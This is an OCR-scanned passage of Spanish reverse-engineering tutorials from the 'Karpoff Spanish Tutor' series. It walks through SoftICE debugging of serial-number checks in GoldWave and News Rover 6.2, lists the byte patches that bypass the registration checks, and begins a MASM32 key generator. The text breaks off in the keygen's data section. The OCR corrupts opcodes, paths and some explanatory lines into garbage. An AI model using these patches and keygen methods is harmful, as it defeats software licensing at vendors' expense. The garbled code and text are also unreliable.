ponerle un BPR [resultado busqueda] [resultado busqueda + N* de caracteres] RW. 

-. Utilizar el comando TASK para identificar la tarea que nos interesa (Goldwave*), seguir con un 
HWND GOLDWAVE para acabar poniendo un BMSG [valor del Window Handle del primer Edit] 
WM_GETTEXT. 

-. Directamente y solo por probar BPPX HMEMCPY. La experiencia siempre es un grado, ;-). 


Cualquiera de los tres metodos funciona perfectamente y nos permitirá saltar a Softlce después de pulsar el botón de 
OK. ¿Estamos?, ¿Si?, Pues vamos directamente al código que genera el Serial válido. 


EL CÓDIGO 
Después de trazar un rato, salir al código real del programa y seguir otro rato con F8 encontramos esto: 


:00461B40 OFBEOA movsx ecx, byte ptr [edx] -> Último carácter del First Name. 

:00461B43 03C8 add ecx, eax -> Suma al valor del carácter el [N* de caracteres - 1]. 

:00461B45 03D9 add ebx, ecx -> Lo suma a EBX que empieza de 0. 

:00461B47 4A dec edx -> Siguiente caracter. 

:00461B48 8BC8 mov ecx, eax -> ECX hace de contador. 

:00461B4A 83C0FF add eax, FFFFFFFF -> Disminuye EAX y lo prepara para el siguiente carácter. 
:00461B4D 85C9 test ecx, ecx -> Comprobación del contador. 

:00461B4F 75EF jne 00461B40 -> Si no es 0 volvemos arriba. 


Hemos introducido ARK como First Name, teniendo en cuenta que la manipulación empieza con el último caracter y 
de ahí va hacia atras la siguiente tabla aclarará un poco las cosas: 


POSICION [P] | CARACTER VALOR + [P-1] 


Un rato después y después de unas comprobaciones de la longitud de los datos introducidos, en la dirección :00461B72 
encontramos otro fragmento de código similar que manipula el Last Name, esta vez la suma se acumula en ESI, y la 


tabla correspondiente es: 


A a 


De momento claro hasta aquí ¿no?. Ha cogido los caracteres del Nombre y los ha manipulado hasta obtener dos 
valores que están en EBX = El y en ESI = 261. Veamos que hace con ellos, este es el código donde se efectua la 
manipulación: 


:00461B9B 03F8 add edi, eax -> Suma el Número de caracteres, First Name + Last Name, [3+8 = B]. 
:00461B9D 59 pop ecx -> Recupera ECX cuyo valor es 0. 

:00461B9E 8BC7 mov eax, edi -> La suma de los caracteres a EAX = B. 

:00461BA0 8BDO mov edx, eax -> Lo mueve a EDX y empieza el baile... 

:00461BA2 8B4508 mov eax, dword ptr [ebp+08] -> Con esto pone EAX a 0. 
:00461BAS5 C1E204 shl edx, 04 -> Desplaza a la izquierda 4 bits. Valor de EDX = BO. 
:00461BA8 8D1452 lea edx, dword ptr [edx+2*edx] -> Empiezan 

:00461BAB 8D1492 lea edx, dword ptr [edx+4*edx] -> las 

:00461BAE 8D1492 lea edx, dword ptr [edx+4*edx] -> operaciones 

:00461BB1 8D1492 lea edx, dword ptr [edx+4*edx] -> matemáticas para 

:00461BB4 03DA add ebx, edx -> sumar el valor obtenido al valor del Fist Name [E1]. 
:00461BB6 8B55FC mov edx, dword ptr [ebp-04] -> Se pone EDX a 0. 

:00461BB9 8BCB mov ecx, ebx -> Movemos el resultado anterior a ECX. 

:00461BBB C1E104 shl ecx, 04 -> Desplaza de nuevo 4 bits a la izquierda. 

:00461BBE 8D0C49 lea ecx, dword ptr [ecx+2*ecx] -> Más 

:00461BC1 8D0C89 lea ecx, dword ptr [ecx+4*ecx] -> operaciones 

:00461BC4 8D0C809 lea ecx, dword ptr [ecx+4*ecx] -> matemáticas 

:00461BC7 8DO0C809 lea ecx, dword ptr [ecx+4*ecx] -> para 

:00461BCA 03Fl add esi, ecx -> sumar el nuevo valor al valor del Last Name, [261]. 
:00461BCC 8BDE mov ebx, esi -> El resultado final a EBX 

:00461BCE 8D741032 lea esi, dword ptr [eax+edx+32] -> Una dirección que será usada luego. 
:00461BD2 85DB test ebx, ebx -> Chequeo de control. 

:00461BD4 7425 je 00461BFB -> No saltamos... 


Después de todo esto tenemos en EBX el valor 17AF16D1, ¿será este el Número buscado?, pues no, la cosa todavía 
sigue un poco más. Inmediatamente después del salto anterior siguen las operaciones matemáticas: 


:00461BD6 8BC3 mov eax, ebx -> El valor final obtenido, 17AF16D1, a EAX. 

:00461BD8 33D2 xor edx, edx -> Ponemos EDX a 0. 

:00461BDA B91A000000 mov ecx, 0000001A -> El divisor de la siguiente operación. 

:00461BDF F7Fl div ecx -> Divide EAX entre ECX, el cociente se queda en EAX y el resto va EDX. 
:00461BE1 80C241 add dl, 41-> Le suma 41 al resto y ya tenemos el primer caracter del Serial válido. 
:00461BE4 8BC3 mov eax, ebx -> Otra vez el valor final en EAX. 

:00461BE6 8816 mov byte ptr [esi], dl -> El caracter obtenido a la dirección donde se creará el Serial. 
:00461BE8 33D2 xor edx, edx -> Lo ponemos a 0 para la siguiente operación. 

:00461BEA B91A000000 mov ecx, 0000001A -> El divisor de nuevo. 

:00461BEF 46 inc esi -> Incrementa la dirección de ESI para el siguiente caracter. 

:00461BFO0 F7Fl div ecx -> Otra división. 

:00461BF2 FF45FC inc [ebp-04] -> Aquí aparece el contador de caracteres del Serial bueno. 
:00461BF5 89C3 mov ebx, eax -> Prepara EBX para la siguiente vuelta. 

:00461BF7 85DB test ebx, ebx -> Comprobación de control. 

:00461BF9 75DB jne 00461BD6 -> Volvemos arriba... 


Poniendo todo en claro para que nos enteremos, la cosa es más o menos así: 


ALGORITMO DE UN SERIAL VÁLIDO 


First Name: SUMA [Valor caracter + (Posición - 1)] = VALOR 1, (VD). 
Last Name: SUMA [Valor caracter + (Posición - 1)] = VALOR 2, (V2). (*) 


(*) No te rias, pero usando sólo valores numéricos como caracteres del Nombre puedes convertir una hoja 
de Excel en un Keygen. (Paja mental producto de una espectacular resaca). ¡Y funciona! 


N” Total de caracteres: N' carateres First Name + N' caracteres Last Name = X, 


Le añadimos un 0 a la derecha, nos queda X 0, entonces: 
[X 0 + Q*X 0)] = A 

[A + (4*A)] = B 

[B + (4*B)] = C 

[C + (4*C)] = RESULTADO 1, (R1) 


Lo sumamos al valor del First Name: 
V1 + R1 = SUMA 1, (S1) 


esta suma le añadimos otro cero a la derecha, (S1 0), y seguimos: 
[S1 0 + (2*S1 0)] =D 
[D + (4*D)] = F 
[F + (4*F)] = G 
[G + (4*G)] = RESULTADO 2, (R2) 


Le sumanos al valor correspondiente del Last Name: 
V2 + R2 = Valor obtenido del Nombre. 


Por último hacemos las divisiones teniendo en cuenta que solo el resto resultante de la 
secuencia impar de operaciones va a ser utilizado para generar el Número de Serie válido: 


1.) Valor obtenido del Nombre = Cociente 1; Resto + 41 = Primer caracter del Serial. 


a eñad ciencia ciecióta nde 1A 

2.) Cociente 1= Cociente 2, 

onesnlaaiddn 1A 

3.) Cociente 2 = Cociente 3; Resto + 41 = Segundo caracter del Serial. 
dorernatinnsss 1A 

4.) Cociente 3 = Cociente 4, 

it 1A 


Todo esto en hexadecimal, por supuesto. 


¿Complicado?, a simple vista si, pero piensa que este es bastante fácil, el código está a las claras y solo necesitamos 
papel y algo para escribir para descifrar el algoritmo. 


Solo queda poner el Serial hallado en su sitio para obtener esto: 


FINALIZANDO 


Dudas y otras consultas a: 


arkanian O mailcity.com 


Saludos y hasta otra. 


Karpoff Spanish Tutor: Página dedicada a la divulgación de información en Castellano, sobre 


Ingeniería Inversa y Programación. Email "Colabora con tus Proyectos" 


Programa: 


Karpoff Spanish Tutor 


News Rover 6.2 rev. 3 


PROTECCION: Name / Serial 

Objetivo: Hacer un Keygen 

Descripcion: Gestiona mensajes de grupos de noticias O eso creo... 
Dificultad: Será fácil, pero a mí me ha costado lo suyo :o( 

DOWNLOAD: ftp://ftp118.pair.com/pub/sandh/nrsetup.exe 

Herramientas: Softice 

CRACKER: CaoS ReptantE FECHA: 14/05/2001 


INTRODUCCION 


Empiezo este tutorial como empezaba el gaucho Martín Fierro el relato de sus desdichas: 


"Aquí me pongo a cantar 
al compás de la vigiiela, 
que el hombre que lo desvela 
una pena estraordinaria, 
como la ave solitaria 
con el cantar se consuela." 


Y es que no se sabe si reír o llorar. Este programador es ponzoñoso. Creo que el crackear este programa ha 
acelerado el irreversible proceso de mi decrepitud... :o( 

Primero me encontré con la sorpresa de que los cambios efectuados por el Softlce EN LA MEMORIA, se 
guardan en el ejecutable, que queda alterado, conservando la fecha y hora originales. Sé que esto es difícil 
de creer, pero fácil de comprobar. Estos cambios, además, no sólo consisten en la modificación, por 
ejemplo, de un salto que hayamos podido hacer sobre la marcha, si no que, si hemos hecho un breakpoint a 
una dirección de la memoria, nos coloca CC en esa dirección del programa (no lo hace en caso de 
breakpoints que no se refieran a direcciones concretas como por ejemplo, hmemcpy o funciones similares). 
¿Por qué CC? Es la codificación de la instrucción INT3 que es la que utiliza el Softlce para detener la 
ejecución del programa "víctima". De aquí resulta que si miramos esa dirección del programa con un editor 
hexadecimal, vemos CC, pero si ejecutamos el programa, el Slce se detiene y no nos muestra CC, sino la 
instrucción que debería ir en ese lugar. A causa de estas manipulaciones, veremos como acaba apareciendo 
la famosa ventana que nos informa de que "Este programa ha efectuado una operación no...” y a la calle. 
Esto quiere decir que el sacar una copia de seguridad del ejecutable, que en otros casos es conveniente, 
aquí es imprescindible. 


Y luego está la lista negra. Sí, una lista negra en la que se incluyen más de un centenar de textos, entre 
nombres de crackers y textos susceptibles de ser utilizados en pruebas como "bla bla", "qwerty", 
"registered" etc. También ha pensado el programador en los castellanoparlantes y ha incluido "lo que sea". 
Que Dios le bendiga... :'o( 


Pero vamos a ver, ¿de verdad cree este hombre que merece la pena tomarse el trabajo de crear esa 
larguísima lista negra, cuando su flamante programa lo puede crackear un indocumentado como yo, 
cambiando ocho tristes bytes? En fin, si así se ha quedado a gusto, bien hecho está. De todos modos, no 
vamos a parchear el programa sino a hacer un generador de números de registro. De hecho, la única 
utilidad de la lista negra es que nos obliga a poner una advertencia en el keygen, previniendo al posible 
usuario de que éste puede fallar. 


Después del trabajo que me ha costado hacer el keygen, espero figurar en la lista negra de la próxima 
versión. Si no es así, tendré que ponerme en contacto con el infausto programador y decirle cuatro cosas 
bien dichas... :0D 


AL ATAKE 


El proceso que se sigue para la comprobación del número es básicamente el siguiente: Lo primero que hace, es pasar 
el número decimal introducido (de un mínimo de 9 cifras) a hexadecimal, lo descompone en dos números que divide 
por dos y por cuatro, hace una serie de permutaciones, operaciones XOR y finalmente compara cuatro cifras del 
número resultante con otras cuatro de un número obtenido a partir del nombre, ayudándose de una tabla que ya 
hemos visto en alguna otra ocasión. 


Vamos a intentar seguir este proceso de manera que se entienda. :0) 


En primer lugar, arrancamos el programa con el Softlce agazapado, y veremos una ventana en la que, con la excusa 
de darnos la bienvenida, nos pide que nos registremos. Así pues, introduciremos nuestros datos de registro, en este 
caso: Caos reptante como nombre y 305441741 como número. ¿Que es un número raro? ya veréis como no. Una vez 
introducidos los datos y antes de pulsar "Enter..." entramos en el Slce y ponemos la instrucción bpx 
getwindowtexta. A continuación, volvemos al programa y pulsamos "Enter..." El Slce se detiene. Damos una vez a 
FS para que lea la otra ventana, luego a F12 y caemos en este punto: 


* Reference To: USER32.GetWindowTextA, Ord:015Eh 


:00511325 FF1598765400 Call dword ptr [00547698] 
:0051132B EB12 jmp 0051133F 


Aquí trataremos de pillar al programa cuando lee nuestro nombre o número mediante las instrucciones s 30:00 1 
f£ffffff "Caos reptante' y s 30:00 1 ffffffff "305441741". Una vez sabemos donde guarda el programa nuestros datos, 
estableceremos los correspondientes breakpoints: bpm direccion_nombre rw y bpm direccion_numero rw. Damos a 
FS para continuar y nos detenemos en: 


:004584B9 F2 repnz 

:004584BA AE scasb 

:004584BB F7D1 not ecx 

:004584BD 49 dec ecx 

:004584BE 83F901 cmp ecx, 00000001 


Aquí comprueba que el nombre tenga al menos una letra :0) 


:004584C1 0F8278050000 jb 00458A3F 

:004584C7 8D7C2478 lea edi, dword ptr [esp+78] 
:004584CB 83C9FF or ecx, FEFFFFEF 

:004584CE F2 repnz 

:004584CF AE scasb 

:004584D0 F7D1 not ecx 

:004584D2 49 dec ecx 

:004584D3 83F909 cmp ecx, 00000009 


Y aquí, que el número tiene al menos nueve cifras. Si quisiéramos parchear el programa, substituiríamos el 09 por 01 
(primer byte). 


:004584D6 0F8263050000 Jb 00458A3F 


Este salto nos mandaría a freír espárragos. 
Seguimos adelante y llegamos a la rutina que convierte nuestro número en hexadecimal: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00458543(C) 

:0045851B OFBE0O6 movsx eax, byte ptr [esi]l 
:0045851E 50 push eax 


:00458541 3AC3 cmp al, bl 
:00458543 75D6 jne 0045851B 
:00458545 8B4C2410 mov ecx, dword ptr [esp+10] 


Una vez convertido nuestro número (ECX=1234ABCD) podéis ver que no era tan raro :0) 


:00458549 890DB44F5B00 mov dword ptr [005B4FB4], ecx 
:0045854F E89CA1FCEF call 004226F0 
:00458554 DC2530315B00 fsub qword ptr [005B3130] 


:0045858A 50 push eax 
:0045858B DDD8 fstp st (0) 
:0045858D E86EF6FFFF call 00457C00 


* Referenced by a CALL at Addresses: 
| :0040DB27 , :0042F53C , :00457B9E , :0045858D , :004D2EF3 


:00457C00 8B442408 mov eax, dword ptr [esp+08] EAX=1234ABCD 

:00457C04 8B4C2404 mov ecx, dword ptr [esp+04] ECX=83EB84, la 
dirección de 
nuestro nombre 

:00457C08 83EC0OC sub esp, 0000000C 

:00457C0B 53 push ebx 

:00457C0C 55 push ebp 

:00457C0D 56 push esi 

:00457C0E 57 push edi 

:00457C0F 50 push eax 

:00457C10 51 push ecx 

:00457C11 E83AF50700 call 004D7150 


En este call, se comprueba que se haya introducido un nombre (4D71A4), que dicho nombre no esté en la lista negra 
(4D71El1) y que se haya introducido un número distinto de O (4D71F4 y 4D71FD). Si quisiéramos parchear el 
programa, substituiríamos en la dirección 4D71E3 el salto 74 30 por 90 90 (segundo y tercer bytes). Ya estamos de 
vuelta: 


:00457C16 83C408 add esp, 00000008 

:00457C19 89442424 mov dword ptr [esp+24], eax pone en 83EB6C, 
el valor CDAB3412 

:00457C1D 85C0 test eax, eax 

:00457C1F 750D jne 00457C2E 


Saltamos... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00457C1F (C) 


:00457C2E 8D542424 lea edx, dword ptr [esp+24] 83EB6C 
:00457C32 6A04 push 00000004 

:00457C34 52 push edx 

:00457C35 E866010000 call 00457DA0 


Entramos en el call y no parece haber nada interesante hasta que llegamos a este bucle: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address 
| :00457E5D (C) 


:00457DEB 8D542414 lea edx, dword ptr [esp+14] 
:00457DEF 52 push edx 

:00457DF0 6A00 push 00000000 

:00457DF2 E829010000 call 00457F20 

:00457DF7 8BD8 mov ebx, eax 

:00457DF9 8D44241C lea eax, dword ptr [esp+1C] 
:00457DFD 50 push eax 

:00457DFE 6A00 push 00000000 

:00457E00 E81B010000 call 00457F20 

:00457E05 8A1430 mov dl, byte ptr [eax+esi] 


Este bucle se ejecuta dos veces, en la primera ESI =83EB6C (Este registro apunta a una posición de la memoria que 
no siempre es la misma, por lo que esta y otras direcciones que indico aquí, sólo son válidas como referencia) y 
EAX=2 por lo tanto, pone en DL el valor 34. La segunda vez EAX=0 y el valor de DL será CD. 


:00457E08 8A0C33 mov cl, byte ptr [ebx+esi] 


La primera vez, EBX=3 y por lo tanto CL=12, la segunda, EBX=1 y CL= AB. Para no complicar demasiado la 
explicación, en las instrucciones siguientes veremos lo que ocurre en el primer paso por el bucle, y al final del 
mismo, veremos lo que ha ocurrido en el segundo paso. 


:00457E0B 89442420 mov dword ptr [esp+20], eax 
:00457E0F 8D442424 lea eax, dword ptr [esp+24] 
:00457E13 50 push eax 

:00457E14 6A01 push 00000001 


Ahora va a poner un número en la dirección 83EB44: 


:00457E16 C644247000 mov [esp+70], 00 
:00457E1B 884C2471 mov byte ptr [esp+71], cl 
:00457E1F 88542472 mov byte ptr [esp+72], dl 
:00457E23 C644247300 mov [esp+73], 00 


Ahora en 83EB44 tenemos: 00 12 34 00. 


:00457E28 E8F3000000 call 00457F20 

:00457E2D 8B542470 mov edx, dword ptr [esp+70] EDX=00341200 
:00457E31 8BC8 mov ecx, eax ECX=2 
:00457E33 D3EA shr edx, cl EDX=000D0480 


Desplaza los bits dos posiciones a la derecha, lo que equivale a dividir por 4 


:00457E35 8B442428 mov eax, dword ptr [esp+28] 

:00457E39 83C418 add esp, 00000018 

:00457E3C 89542458 mov dword ptr [esp+58], edx pone en 83EB44,el 
valor 80040D00 

:00457E40 8A4C2459 mov cl, byte ptr [esp+59] CL=04 

:00457E44 8A54245A mov dl, byte ptr [esp+5A] DL=0D 

:00457E48 880C33 mov byte ptr [ebx+esil], cl pone en 83EB6F, 04 

:00457E4B 8A4C2458 mov cl, byte ptr [esp+58] CL=80 


:00457E4F OAD1 os al, cel DL=8D 


El programa quiere obtener dos cifras de esta operación: una de ellas será el tercer byte (04) y la otra el resultado de 
"orear" el segundo con el cuarto (0D or 80=8D). 


:00457E51 881430 mov byte ptr [eax+esil], dl pone en 83EB6E,8D 
:00457E54 8B442454 mov eax, dword ptr [esp+54] 

:00457E58 48 dec eax EAX=1 

:00457E59 89442454 mov dword ptr [esp+54], eax 

:00457E5D 758€ jne 00457DEB repite el bucle 


Hemos visto con detalle lo que sucede en el primer paso por el bucle. En el segundo paso, jugamos con otro número: 
00ABCDOO. Al efectuar la instrucción SHR, el valor de ECX es 1, lo que significa que este segundo número se 
divide por dos en vez de por cuatro, lo que da un resultado de 0066D380. Como consecuencia, se coloca el número 
DS en la posición 83EB6D y el E6 en la83EB6C. Así pues, en la posición 83EB6C tenemos el número E6 D5 8D 04 
(Insisto en que esta dirección puede no ser la misma). 


Continuamos nuestro recorrido y llegamos a un nuevo bucle. Este bucle se repite cuatro veces y su misión es la de 
tomar uno a uno los cuatro bytes que forman el número E6 DS 8D 04 y "xorearlos" con los números 17, 76, 51 y 98 
respectivamente, volviéndolos a dejar donde estaban. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00457EAE (C) 


:00457E8E 8D542414 lea edx, dword ptr [esp+14] 
:00457E92 52 push edx 

:00457E93 6A00 push 00000000 

:00457E95 E886000000 call 00457F20 

:00457E9A 8A4C2460 mov cl, byte ptr [esp+60] 
:00457E9E 8A1433 mov dl, byte ptr [ebx+esi] 


Aquí DL va tomando los valores E6, D5 etc. 


:00457EA1 32C1 xor al, el 


AL vuelve del call con los valores 17, 76 etc. y se "xorea" con CL que siempre vale 0. Muy útil :0) 


:00457EA3 83C408 add esp, 00000008 
:00457EA6 32D0O xor dl, al 


Esta si es útil. E6 xor 17=F1, DS xor 76=A3, 8D xor 51=DC y 04 xor 98=9C 


:00457EA8 881433 mov byte ptr [ebx+esil], dl 


Aquí los vuelve a colocar en su sitio. 


:00457EAB 43 inc ebx 
:00457EAC 3BDF cmp ebx, edi 
:00457EAE CDE 31 00457E8E repite el bucle 


En este momento tenemos en 83EB6C el número Fl A3 DC 9C. 


A partir de aquí, se pone a hacer cálculos aparentemente innecesarios con estos números, hasta que llegamos a otro 
bucle. Y van... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00457F0C (C) 

:00457EF4 8D542414 lea edx, dword ptr [esp+14] 
:00457EF8 8BE8 mov ebp, eax 


:00457EFA 52 push edx 

:00457EFB 6A00 push 00000000 

:00457EFD E81E000000 call 00457F20 

:00457F02 8A0C30 mov cl, byte ptr [eax+esi] 
:00457F05 83C408 add esp, 00000008 
:00457F08 4F dec edi 

:00457F09 880C2E mov byte ptr [esitebpl, cl 
:00457F0C 75E6 jne 00457EF4 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00457EF1 (C) 


:00457F0E 881C30 mov byte ptr [eax+esil, bl 
:00457F11 5F pop edi 

:00457F12 5E pop esi 

:00457F13 5D pop ebp 

:00457F14 5B pop ebx 

:00457F15 83C440 add esp, 00000040 
:00457F18 C3 ret 


No me parece necesario dar detalles, sólo decir que hace un desplazamiento de números colocando la última cifra en 
primer lugar, por lo que nuestro número que era F1 A3 DC 9C, ha pasado a ser 9C F1 A3 DC. Recordemos este 
valor porque es fundamental, como veremos más adelante. 


:00457C35 E866010000 call 00457DA0 
:00457C3A 8B44242C mov eax, dword ptr [esp+2C] 


Pongo este trocito de código para recordaros donde estamos, por si lo habíais olvidado :oD 


El programa continua haciendo cálculos y llegamos al cojonésimo bucle, que se efectúa siete veces: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00457C7F (C) 


:00457C74 8BE8 mov ebp, eax EBP=DCA3F19C 
:00457C76 83E50F and ebp, 0000000F EBP=0000000€ 
:00457C79 33D5 xor edx, ebp EDX=0000000C 
:00457C7B C1E804 shr eax, 04 EAX=0DCA3F19 
:00457C7E 4E dec esi 

:00457C7F 75F3 jne 00457C74 repite el bucle 
:00457C81 3BD1 cmp edx, ecx 

:00457C83 740D je 00457C92 


Parece claro lo que hace: "xorea" las siete últimas cifras y compara el resultado con la primera. Si coincide, este 
último salto nos permite continuar, en caso contrario, nos echa a los marrajos. La instrucción AND se emplea para 
dejar sólo la última cifra del registro y la SHR hace desaparecer por la derecha la última cifra, para poder coger la 
penúltima. Si quisiéramos parchear el programa, substituiríamos en la dirección de este salto, 74 por EB (cuarto 
byte). Con el número que hemos puesto, no pasamos de aquí, pero como somos unos tramposos, forzamos el salto 
mediante la instrucción r fl z y seguimos nuestro camino... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00457C83(C) 


:00457C92 8B6C2420 mov ebp, dword ptr [esp+20] 
:00457C96 33C0 xor eax, eax 

:00457C98 89442410 mov dword ptr [esp+10], eax 
:00457C9C 89442414 mov dword ptr [esp+14], eax 
:00457CA0 807D0000 cmp byte ptr [ebp+00], 00 
:00457CA4 7450 je 00457CF6 


Aquí ha comprobado si se había entrado un nombre, como lo habíamos entrado, nos deja continuar. Aquí entramos 
en el último bucle, el que calcula un número a partir del nombre. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00457CF2 (C) 


:00457CA6 8A4500 mov al, byte ptr [ebp+00] AL=43 (código de "C") 
:00457CA9 25FF000000 and eax, 000000FF 

:00457CAE 8BFO mov esi, eax 

:00457CBO 8BCE mov ecx, esi 

:00457CB2 81El1FFFFO0O000 and ecx, 0O000FFFF 

:00457CB8 51 push ecx 

:00457CB9 E8F5A50900 call 004F22B3 


* Referenced by a CALL at Addresses: 
| :00406A61 , :0040A049 , :00457CB9 , :004634E4 , :004634FB 
:004F22B3 833D849D590001 cmp dword ptr [00599D84], 00000001 
:004F22BA 7El1 jle 004F22CD 


Este call es llamado desde 86 sitios, por lo que supongo que esta comprobación debe ser muy importante, aunque no 
sé para qué, porque el programa por lo que he visto, salta siempre. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :004F22BA(C) 

:004F22CD 8B442404 mov eax, dword ptr [esp+04] 

* Possible StringData Ref from Data Obj ->" COLO Li 

=>" .H" 

:004F22D1 8B0D789B5900 mov ecx, dword ptr [00599B78] ECX apunta ahora 
al inicio de una 
tabla 

:004F22D7 668B0441 mov aX, word ptr [ecx+2*eax] 

:004F22DB 2507010000 and eax, 00000107 

:004F22E0 C3 ret 


Como vemos, cuenta a partir del inicio de la tabla, el doble del valor del código ASCII de la letra, toma el valor que 
hay en esa posición y lo "andea" con 107. Volvemos. 


:00457CBE 83C404 add esp, 00000004 
:00457CC1 85C0 test eax, eax 
:00457CC3 7427 je 00457CEC 


Si el valor que hemos obtenido antes es cero, pasamos a la letra siguiente. 


:00457CC5 6683FE61 cmp si, 0061 
:00457CC9 720€ jb 00457CD7 
:00457CCB 6683FE7A cmp si, 007A 
:00457CCF 7706 ja 00457CD7 
:00457CD1 81C6E0FF0000 add esi, 0000FFEO 


"o" 


Si el código de la letra es mayor que el de "a" y menor que el de "z", le resta 20h. En la práctica, esto quiere decir 
que las cuenta todas como si fueran mayúsculas. 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
| :00457CC9(C), :00457CCF (C) 


:00457CD7 8B442414 mov eax, dword ptr [esp+14] 
:00457CDB 33F0 xor esi, eax 

:00457CDD 40 inc eax 

:00457CDE 89442414 mov dword ptr [esp+14], eax 
:00457CE2 8B442410 mov eax, dword ptr [esp+10] 
:00457CE6 03C6 add eax, esi 

:00457CE8 89442410 mov dword ptr [esp+10], eax 


Toma el valor que hay en ESP+10, le suma el resultado de las operaciones anteriores, y lo guarda en el mismo lugar. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00457CC3 (C) 


:00457CEC 8A4501 mov al, byte ptr [ebp+01] 
:00457CEF 45 inc ebp 

:00457CF0 84C0 test al, al 

:00457CF2 75B2 jne 00457CA6 

:00457CF4 33C0 xor eax, eax 


Coge la letra siguiente, comprueba si no es cero (queda texto por leer), si no lo es, salta al inicio del bucle; en caso 
contrario pasa a la comprobación final (o casi) 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00457CA4 (C) 


:00457CF6 668B542410 mov dx, word ptr [esp+10] 
:00457CFB 663B542418 cmp dx, word ptr [esp+18] 
:00457D00 740D je 00457DOF 


En DX tenemos las cuatro últimas cifras del número formado a partir del nombre (en mi caso 039B) y en ESP+18, 
aquel número que habíamos encontrado antes: 9C F1 A3 DC. Así pues, la comparación es entre los números 039B y 
F10C ya que la lectura en la memoria se hace empezando por el byte menos significativo, que está en primer lugar, y 
terminando por el más significativo, que esta en último lugar. Como la comparación es con DX, el valor que se lee 
es F19C, si la comparación se hubiera hecho con EBX, el valor hubiera sido DCA3F109C. Espero que haya quedado 
claro :o| 

En todo caso, nos iba a echar de nuevo, y de nuevo hacemos r fl z para forzar el salto. Por cierto, si quisiéramos 
parchear el programa, substituiríamos el 74 por EB (quinto byte). 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00457D00(C) 


:00457DO0F 3B3D941F5800 cmp edi, dword ptr [00581F94] 
:00457D15 7DO0D Jjge 00457D24 


¡Animo que ya se acaba! EDI contiene CA, es decir la segunda y tercera cifra de nuestro número chungo (Estos 
números, así como la cuarta cifra que veremos ahora, se determinan entre 457C3A y 457C53) y la experiencia 
demuestra que debe ser igual que el contenido de 581F94 que es 0D. Lo tendremos en cuenta :0) 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00457D15(C) 

:00457D24 83FF14 cmp edi, 00000014 

:00457D27 “TEOD jle 00457D36 


Otro salto que tenemos que forzar y que se efectuará también con el valor OD que decíamos. Si quisiéramos parchear 
el programa, substituiríamos 7E por EB (sexto byte). 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00457D27 (C) 


:00457D36 B901000000 mov ecx, 00000001 

:00457D3B A3981F5800 mov dword ptr [00581F98], eax 
:00457D40 84D9 test el, bl 

:00457D42 741B je 00457D5F 


BL contiene 3, es decir la cuarta cifra de nuestro serial. Este último salto, que yo sepa, sólo tiene que ver con el tipo 
de licencia que nos da el programa, y como antes decía, la experiencia demuestra que es mejor no saltar. A la hora de 
hacer el keygen decidí, con razón o sin ella, que esta cifra fuera el tres. Si quisiéramos parchear el programa, 


substituiríamos 74 1B por 90 90 (séptimo y octavo y último byte). 


¡Muy bien!Con esto hemos terminado la primera parte. Ahora ya sabemos lo que tenemos que hacer para programar 
el keygen. 


Lo primero que hice fue programar un generador de números en Visual Basic, pero el problema del VB en este caso 
es que si quieres hacerle llegar el keygen a alguien y quieres estar seguro de que va a poder ejecutarlo, debes 
enviarle una librería de un tamaño desmesurado en relación a lo que ocupa el keygen. Así que decidí hacerlo con el 
Masm32. 


Para hacer el programa necesitaremos un fichero de recursos y un fichero con el código. 


En el fichero de recursos definiremos todos los elementos que aparecerán en nuestro programa y será algo como 
esto: 


finclude "Amasm32Xincludelresource.h" 


fdefine IDD_DIALOG 1000 
fdefine IDC_NAME 1001 
fdefine IDC_SERIAL 1002 
fdefine IDC_GEN 1003 
fdefine IDC_EXIT 1004 
fdefine IDC_INFO 1005 
fdefine IDC_STATIC -1 


keygen ICON keygen.ico 


IDD_DIALOG DIALOG 100,100,115,65 


STYLE WS_CAPTION | DS_CENTER | WS_SYSMENU |WS_MINIMIZEBOX 


CAPTION "News Rover 6.2 rev. 3" 


FONT 10, "MS Sans Serif" 


¡TEXT "Nombre", IDC_STATIC,8,6,28,12 


TEXT "Serial",IDC_STATIC,8,26,28,12 


EDITTEXT IDC_NAME,36,6,70,12,ES_AUTOHSCROLL | ES_CENTER 


EDITTEXT IDC_SERIAL,36,26,70,12,ES_READONLY | ES_CENTER 


PUSHBUTTON "Generar", IDC_GEN, 8,45,30,14 


PUSHBUTTON "Exit", IDC_EXIT, 42,45,30,14 


PUSHBUTTON "Info",IDC_INFO,76,45,30,14 


Hemos definido: la ventana principal que aparecerá en el centro de la pantalla y tendrá "News Rover...” como título, 
dos textos, dos ventanas de texto, una de ellas con scroll horizontal por si el nombre no cabe y la otra readonly, 
porque sólo el programa debe escribir en ella y tres pulsadores cuya utilidad está clara en el primero y el segundo, y 
en el tercero ya lo veremos... Lo de *+tinclude...resource.h es para no tener que declarar cada una de las constantes 
ES_AUTOHSCROLL, ES_READONLY, etc., ya que este fichero contiene todas estas definiciones. 


Ahora el fichero del código: 


.386 
.model flat,stdcall 
option casemap:none 


include c:imasm32Xincludewindows.inc 
include c:imasm32Xincludeluser32.inc 
include c:imasm32Xincludelkernel32.inc 
includelib c:imasm321libluser32.1lib 
includelib c:imasm3211liblkernel32.1lib 


.const 

IDD_DIALOG EQU 1000 
IDC_NAME EQU 1001 
IDC_SERIAL EQU 1002 
_GEN EQU 1003 
_EXIT EQU 1004 
IDC_INFO EQU 1005 


DlgFunc PROTO : DWORD, :DWORD, :DWORD, : DWORD 


Operacion PROTO 


.data 

nombre db 30 dup(0 
serial db 10 dup(0 
largo db 02 dup(0), 
nada db 20 dup(0),0 
Icono db "keygen",0 
Iconimage db "keygen",0 

minombre db "CaoS ReptantE",0 

